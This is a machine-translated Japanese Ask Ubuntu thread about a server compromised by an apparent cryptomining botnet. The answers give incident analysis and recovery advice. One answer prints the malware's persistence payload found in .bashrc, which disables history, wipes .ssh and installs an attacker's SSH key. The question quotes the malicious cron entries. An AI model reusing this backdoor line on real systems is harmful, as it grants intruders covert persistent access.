ストレンジクロンジョブはCPU Ubuntu 18 LTS Serverの100%を占有します


21

私はweのcronジョブを表示し続けていますが、それらが何をするのかわかりません。通常、kill -9を発行してそれらを停止します。CPUの100%を占有し、チェックするまで数日間実行できます。誰もがこれが何を意味するか知っていますか?

sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1

昨日7/24/2019の時点で完全に最新のUbuntu 18 LTSサーバーを実行しています

更新

すべてのフィードバックに感謝します。影響を受けたのはOSドライブだけだったので、すべてのデータドライブとアプリケーションドライブを切断しました。少なくともそのようなことは適切に行いました。より多くのセキュリティとより安全な方法で、完全に再構築します。


8
.firefoxcatcheたぶん、Firefoxとは何の関係もありません。これは単なるビットコインのマイナーでしょうか。実行可能ファイルをvirustotalにアップロードしてみてください。
トムウィガーズ

1
それのcrontabで実行ファイルがある/root/.firefoxcatche/a/upd/root/.firefoxcatche/b/sync
トムWiggers

2
「ハッシュするcrontabが見つかりません」とはどういう意味ですか?なぜsudo crontab -e編集できないのですか?ただし、これがインストールしなかったクリプトマイナーである場合は、それらは再度追加されます。最初に「/root/.firefoxcatche/a/upd」を見てください。
リンツウィンド

2
「そこに到達するためにrootとしてログインする必要がありますか?」これは、管理者から見るとは思わない質問です。これから何をしているかを本当に知る必要があります。管理者パスワードをできるだけ早く変更します。cronにリストされているファイルを調べます。それらを根絶します。
リンツウィンド

1
しかし、それはとても簡単です;-)私は10以上のグーグルクラウドインスタンスを維持しています。何かが起こった場合の不測事態対応計画で、私は間違って行くことを想像できました。このようなことが発生した場合、ルートインスタンスを破棄し、新しいインスタンスを作成し、クローンに対してデータディスクをスキャンし、差分をスキャンしてからインスタンスにアタッチします。そして、この人が再び発生するのを防ぐために、この人をトラップするための何かを実装します。私の場合、私の小切手はそれに依存しています;-)
Rinzwind

回答:


40

お使いのマシンには、おそらくクリプトマイナー感染があります。Security Centerを使用してAzureの仮想マシン実際に検出すると、他の誰かが同様のファイル名と動作を報告しているのを見ることができます。参照してください私のUbuntuのサーバーがウイルスを持っている...私はそれを設置しましたが、私はそれを取り除くことができない... Redditの上。

そのマシンを信頼できなくなったため、再インストールする必要があります。バックアップの復元には注意してください。


8
同意する。rootパスワードが危険にさらされたため、再インストールし、バックアップに十分注意してください。そこにもあるかもしれません。
リンツウィンド

9

お使いのマシンは暗号マイナー攻撃に感染しています。また、過去にも同様のランサムウェア攻撃に直面し、データベースが侵害されました。マシンのSQLダンプを取得し、マシンを再プロビジョニングしました(私のマシンはAWS EC2でホストされているVMであったため)。また、マシンのセキュリティグループを変更してSSHアクセスをロックダウンし、パスワードを変更しました。また、ログを有効にしてクエリを記録し、毎晩S3にエクスポートします。


4

私にも同じことが起こり、昨日気づきました。ファイルをチェックする/var/log/syslogと、このIP(185.234.218.40)がcronjobsを自動的に実行しているように見えました。

http://whatismyipaddress.comhttps://whatismyipaddress.com/ip/185.234.218.40)で確認しましたが、いくつかのレポートがあります。これらのファイルはトロイの木馬によって編集されました。

  • .bashrc
  • .ssh / authorized_keys

私はこれを.bashrc(bashが開かれるたびに実行されます)の終わりに見つけました:

set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

authorized_keysファイルを削除します。これは、パスワードなしで接続できるSSHキーのリストです。次に、攻撃者のSSHキーを追加します。

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr

さらに、次のフォルダを見つけました:/tmp/.X13-unix/.rsyncすべてのマルウェアがある場所。/tmp/.X13-unix/.rsync/c/ip70,000個のIPアドレスを含むファイルを見つけましたが、これはおそらく他の被害者またはノードサーバーです。

2つの解決策があります:A:

  • ポート22など必要な他の発信接続を除くすべての発信接続をブロックするファイアウォールを追加し、fail2banを有効にします。これは、Xがパスワードの入力に失敗した後にIPアドレスを禁止するプログラムです。

  • すべてのcronジョブを強制終了します: ps aux | grep cron、表示されるPIDを強制終了します

  • パスワードを安全なものに変更します

B:

  • 必要または必要なファイルまたはフォルダーをバックアップします

  • サーバーをリセットしてUbuntuを再インストールするか、新しいドロップレットを直接作成します

    Thom Wiggersが言ったように、あなたは確かにビットコインマイニングボットネットの一部であり、サーバーにはバックドアがあります。バックドアは、perlエクスプロイト、ここにあるファイルを使用します:/tmp/.X13-unix/.rsync/b/run、これを含む(https://pastebin.com/ceP2jsUy

私が見つけた最も不審なフォルダーは次のとおりです。

  • /tmp/.X13-unix/.rsync

  • ~/.bashrc (編集された)

  • ~/.firefoxcatche

最後に、Perlバックドアに関連する記事があります:https : //blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/

これがあなたのお役に立てば幸いです。


OSドライブを消去し、Ubuntuを再インストールすると、かなり長い新しいパスワードと新しいsshキーが作成されました
MCP_infiltrator

はい、それは良い解決策です:)
Oqhax

これは非常に役立つ回答でした- ~/.bashrc編集された事実をキャッチしていただきありがとうございます。偽物rsyncを殺すためには発行しなければならないことがわかったkill -9 <pid>
ベニーヒル
弊社のサイトを使用することにより、あなたは弊社のクッキーポリシーおよびプライバシーポリシーを読み、理解したものとみなされます。
Licensed under cc by-sa 3.0 with attribution required.